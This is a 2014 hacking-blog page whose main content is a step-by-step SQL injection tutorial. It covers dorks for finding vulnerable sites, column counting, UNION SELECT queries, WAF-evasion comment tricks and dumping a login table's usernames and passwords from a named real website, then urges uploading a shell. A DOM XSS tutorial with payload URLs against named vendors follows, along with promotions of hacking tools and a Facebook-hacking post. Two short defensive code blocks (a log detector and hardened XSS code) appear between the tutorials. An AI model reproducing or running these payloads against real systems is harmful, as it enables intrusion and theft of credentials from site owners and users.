WELCOME TO "Pak SOftwares Spot" !

Learn Hacking , FB Hacking , New Hacking Tricks , And Full Web Hacking Only With Pak Softwares Spot

--------------------------------------------------------------------------

Wednesday, 16 July 2014

SQL Injection Explained With Images



We have seen how to create databases, tables, and columns and how to add records to them in different ways. In this article we will cover SQL injection: how we can hack using SQL injection.

Please rep+ if you like it; it took me 1 hour to complete.

What is SQL injection?

SQL injection is a very common method of hacking websites in this era.
SQL injection is a big subject. Newbies think it is not a big
deal, because they can exploit this vulnerability with scripts like
sqlmap, Havij, sqlninja, and other kiddie scripts,
but SQL injection is such a huge topic that it could take many books to cover it.
So what can you do with SQL injection?
You can access records
You can modify records
You can bypass login areas
You can breach the SQL server

OK, here our first step begins.

Finding vulnerable websites
If you are a hacker, you must know that
search engines are your best friends. We can find vulnerable websites
using Google dorks.
Common dorks are
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=

etc. There is a huge list of dorks.

If you search for any one of these, you will find many websites. Open any of them
and you will see a URL like


Code:
website.com/index.php?id=1
The value could be anything.
To test whether the site is vulnerable, just put a ' at the end of the URL
so that it looks like

Code:
website.com/index.php?id=1'

If you see an error like

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
or
Warning: mysql_fetch_array()

or any other MySQL error, or if you see any content of the page missing,
then the site is vulnerable.

Example

[Image: lgtf2af.png]

You can see it's a MySQL error, so the website is vulnerable.

So now let's move to the next step.

EXPLOITING the vulnerability

Now that we have found a vulnerable website, it's time to fetch the secret data.

Our next step is to find the number of columns in the table.

For that we replace the ' with an order by statement

like
Code:
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--

We need to keep increasing the order by number until we get an error like
unknown column number, or until we find some content missing from the page.

example
Code:
http://www.cementcorporation.co.in/page.php?id=20 order by 1-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 2-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 3-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 10-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 20-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 21-- ERROR / CONTENT MISSING IN PAGE

SO NOW WE SEE THAT WE GOT AN ERROR AT ORDER BY 21 BUT NO ERROR AT ORDER BY 20,
SO THAT MEANS WE HAVE 20 COLUMNS

Sometimes this never works and we don't get an error even at order by 1000.
In that case we put a ' at the end of the id parameter and a + at the end of the query,
like
Code:
http://www.cementcorporation.co.in/page.php?id=20' order by 21--+ error

Now the next step begins.

Union Select

Now that we know we have 20 columns, it's time to select all the columns using union select.
The select statement is used to view data. If you want to learn more about SQL, you can check my
article on working with SQL.
OK, for now

we use a statement like

Code:
http://www.cementcorporation.co.in/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

Now you will see some of the column numbers on the page,
like 1, 5, 7, or any other.
If you don't see them, place a - before the parameter value.
Example

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

You can see it in the picture below.

You can see 3 and 4 on the web page. These two are string columns,
and we can retrieve our data in these columns.

Sometimes union select doesn't work because of a WAF (web application firewall), so we add comments to our queries like
/*!union*/+/*!select*/

/*!union*/+(/*!select*/

un/**/ion+sel/**/ect+1,2,3--

/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3--

or change case

/*!UnIOn*//*!SeLect*/+1,2,3--


etc



[Image: oksohyM.png]


Now it's time to retrieve data in these columns.

We can retrieve sensitive data. We can call functions for the database name database(), version info version() or @@version, user info user(),
concat, group_concat(), LOAD_FILE, and many more.

OK, for the tutorial I will call the version function in column 3 and the db and user info in
column 4 using group_concat().

For that I will use
Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

I used 0x3a because it's the hex value of SEMICOLON ( ; ) and it will separate the two different values.

Now you can see in the image that columns 3 and 4 are replaced with the values that I called.

[Image: mYXScSV.png]

OK, next thing:

How to find all databases on the website?

That's easy.

Now we need to replace the column with
a query like this

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.schemata--


see

[Image: lgt73e3.png]

Now we know there are basically two databases,
information_schema and cementco_cement.
Ignore information_schema.
Why? Because information_schema holds the system tables that describe the
databases. We can use these tables to look at the database layout.


OK, now we have our database. (We don't actually need to look the name up: if we are dumping from the current database, we can use
the function database() instead of cementco_cement. The name is needed when we are dumping from outside the current database,
but in this case we will do a simple dump.)

OK, now let's find the tables in the current db.

We will use a WHERE condition in this query now.

We will fetch the tables with a select statement and use the where condition to determine which database's tables we want to fetch.

OK,
syntax

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=database()--

[Image: lgt97a9.png]

Now you can see we have all the table names,
which are

archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit

Now we are going to dump a sensitive table,
which is login.

OK, let's dump it.

Now we will replace group_concat(table_name) with group_concat(column_name) and information_schema.tables with information_schema.columns,
and in the where condition we will change table_schema to table_name
and give it the name of the table in quotes, like
table_name='login'
Why use quotes? Because its datatype is varchar.
Sometimes it does not work,
so we have to convert it into MySQL char. For that I use HackBar.

So now our query looks like this.

The MySQL char value of login is CHAR(108, 111, 103, 105, 110)

Example

Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--

Yeah, now we can see the columns of the table 'login',
which are id,username,password,email,date_added,lastlogin,sessionid,type,status

[Image: 2uxh8Qh.png]

OK, now the fun begins: time to dump the columns.
For example, if we need to dump the username and password columns from the table 'login', we will replace the query with

select group_concat(username,0x3a,password) from login--
dumped

syntax
Code:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--

[Image: sE3M29s.png]

You can see username:password on the web page.

Now just find the admin panel and upload the shell.

Was it easy? Yeah, but sometimes a WAF can mess with your mind.

Now, dealing with error-based SQL injections:

I have already posted that tutorial here

http://www.madleets.com/Thread-double-qu...tion-video
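
The comment and case disguises listed in the WAF paragraph above work against filters that match the literal text `union select`. The following added example (not part of the original tutorial) is a log-review sketch that normalizes a query string before matching; the signature names, function names, and request lines are constructed for illustration.

```javascript
// Added example, not from the original post. Request lines below are constructed.
const SIGNATURES = [
  { name: 'quote-probe', re: /\bid=-?\d+\s*'/ },
  { name: 'order-by-probe', re: /\border\s*by\s*\d+/ },
  { name: 'union-select', re: /\bunion\s*(?:all\s*)?\(?\s*select(?![a-z])/ },
  { name: 'schema-enumeration', re: /\binformation_schema\b/ },
];

// Undo the disguises before matching: '+' as space, percent-encoding,
// mixed case, and SQL comment delimiters (plain and MySQL /*! ... */).
function normalize(query) {
  let s = query.replace(/\+/g, ' ');
  try {
    s = decodeURIComponent(s);
  } catch (err) {
    // Malformed escape sequence: keep matching on the undecoded text.
  }
  // Delete the delimiters but keep comment bodies, so /*!UnIOn*/ and
  // un/**/ion both collapse to "union".
  return s.toLowerCase().replace(/\/\*(?:!\d*)?|\*\//g, '');
}

// Return the names of every signature the request's query string matches.
function classify(requestTarget) {
  const at = requestTarget.indexOf('?');
  const text = at === -1 ? '' : normalize(requestTarget.slice(at + 1));
  return SIGNATURES.filter((sig) => sig.re.test(text)).map((sig) => sig.name);
}

const SAMPLE_REQUESTS = [
  "/page.php?id=20",
  "/page.php?id=20'",
  "/page.php?id=20%20order%20by%2021--",
  "/page.php?id=-20+/*!UnIOn*//*!SeLect*/+1,2,3--",
  "/page.php?id=-20+un/**/ion+sel/**/ect+1,2,3--",
  "/page.php?id=-20+union+select+1,2,group_concat(table_name)+from+information_schema.tables--",
  "/search.php?q=trade+union+selection+committee", // benign text, must stay clean
];

for (const target of SAMPLE_REQUESTS) {
  console.log(classify(target).join(',') || 'clean', '<-', target);
}
```

Matching like this is a heuristic for spotting probing in access logs. The fix for the flaw itself is to bind id as an integer parameter in the query instead of concatenating it into the SQL string.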


DOM XSS TUT BY DARKSNIPPER


What is DOM?

DOM stands for Document Object Model, which allows client-side scripts (e.g. JavaScript) to dynamically access and modify the content, structure, and style of a webpage.
Like server-side scripts, client-side scripts can also accept and manipulate user input with the help of DOM.

Example


PHP Code:
<html>
<head>
</head>
<body>
<script>
var pos=document.URL.indexOf("madleetop=")+10;   //finds the position of value
var userInput=document.URL.substring(pos,document.URL.length);  //copy the value into userInput variable
document.write(unescape(userInput));  //writes content to the webpage
</script>
</body>
</html>
I use spaces because the site is filtering my content and removing HTML tags.


In the above example, the JavaScript code gets the value from the URL parameter "madleetop" and writes the value into our webpage.

For example, if the URL is
Code:
www.madleets.com/snipper?madleetop=me
the webpage will display "me"

Did you notice? That part of the webpage is not written by the server-side script. The client-side script modifies the content dynamically based on the input. Everything is done with the help of the DOM object 'document'.
Hope you understand.

DOM Based XSS vulnerability:

When a web developer writes content using a DOM object without sanitizing the user input, it allows an attacker to run his own code.
In the above example, we failed to sanitize the input and simply displayed whatever value we got from the URL.
An attacker with malicious intent can inject an XSS vector instead.
For example:
Code:
www.madleets.com/snipper?madleetop= alert("iammad")< / script>
The document.write function simply writes the value of the madleetop parameter into the webpage. So it will write 'alert("iammad")< /script>' into the webpage without sanitizing it. This results in the script code running and displaying the alert box.
More Information
We can inject into other sites, like
http://www.site.com/me.aspx
A user could inject code, for example:

< img src=f00bar onerror=prompt(" xss");> ...into the input text field in the form and click on the "Search" button.
Example no. 2
Kaspersky was also vulnerable to it.
Let me explain how the attacker did it:
The problem was bad validation of location.hash coming from jQuery (which is also outdated).
PHP Code:
/*load current tab by url*/

//if($.url.param("tab"))
$('a[name='+$.url.param("tab")+']').trigger('click');

var hash = location.hash;

if (hash.indexOf("tab=") != -1) {
    // the fragment text goes into the selector without validation
    hash = hash.replace(/^#tab=/, "");
    $('a[name=' + hash + ']').trigger('click');
}

If a user loads the "tab" parameter in the URL, it will execute the code.
Proof of concept:
Code:
http://www.kaspersky.com/tablet-security #tab= < img src=x onerror=prompt( "xs s");>
Note: it has been patched.
I used it just to make it easy to explain.
Example no. 3
AVG was also vulnerable to it, but they patched it.
PoC:
Due to the lack of escaping/encoding of the URL in the code present in the file js_stdfull.js, a user could inject code into the website.

Vulnerable code:
//display the correct tab based on the url (#name)

var pathname = $(location).attr('href');
var urlparts = pathname.split("#");
Proof of concept:
Code:
http://www.avg.com/eu-en/download# " > < im g src=x onerror = prompt( / xss/ );
thanks.
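
Hardened counterparts to the three vulnerable snippets above, as an added example that is not the original author's or the vendors' code: the value is parsed with the URL API and written as text, and the tab name is checked against a fixed list before it reaches a selector. The function names, the tab list, and the sample URL are assumptions.

```javascript
// Added example, not from the original post. Names and sample values are constructed.

// Read one query parameter with the URL parser instead of indexOf()/substring().
function readParam(href, name) {
  return new URL(href).searchParams.get(name) ?? '';
}

// Sink fix: assign to textContent so the browser never parses the value as markup.
// `el` is a DOM element; outside a browser any plain object can stand in for it.
function showValue(el, value) {
  el.textContent = value;
  return el;
}

// For code that has to build an HTML string, encode the five significant characters.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Selector fix for the "#tab=" pattern: accept only names from a fixed list,
// so fragment text is never concatenated into $('a[name=' + ... + ']').
const KNOWN_TABS = new Set(['overview', 'features', 'requirements']); // constructed list
function tabFromHash(hash) {
  const m = /^#tab=([A-Za-z0-9_-]{1,32})$/.exec(hash);
  return m && KNOWN_TABS.has(m[1]) ? m[1] : null;
}

// Stand-alone demonstration with a stand-in element object.
const value = readParam('https://site.example/snipper?madleetop=me', 'madleetop');
console.log(showValue({ textContent: '' }, value).textContent);
console.log(escapeHtml('<img src=x onerror=prompt("xss");>'));
console.log(tabFromHash('#tab=features'), tabFromHash('#tab=<img src=x>'));
```

In the browser, pass `document.URL` and `location.hash` to these functions and trigger the tab click only when `tabFromHash` returns a name.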


Hack a Target Website With This Tool

Hi guys, I just want to share with you this cool script I made a while ago; its name is Targeting Guru.

[Image: 2014-06-28_171146.png]

Link on sourceforge Here


Parrot OS for Hacking, Download + Video TUT


Today I will give you one of the best operating systems for hackers.
It will help you a lot.
It's an upgraded version from Kali.

Parrot 0.9

Photo
[Image: Schermata.png]
[Image: Parrot-forensics.png]
[Image: Schermata-22.png]


LFI scanner Online Working

Asalamu Alikum
After a short break I'm back with an interesting web-hacking post.
So today I'm going to show you how to hack a website using Local File Inclusion.

Local File Inclusion Vulnerability
What You Need
Mozilla Firefox

Dorks: (If you want more dorks, use your brain and make your own dorks)
Tool 
http://www.morimac.com/ficheiros/news/lfi.php


WSPLOIT v1.3 Download

 

It's a simple tool that I coded. I had fun.

[Image: Screenshot%20from%202014-07-13%2013:09:10.png]
Download on SourceForge
https://sourceforge.net/projects/wsploit/


Hack Facebook Via DNS Spoofing (Easy and Best Way)

Video TUT

By MadCode

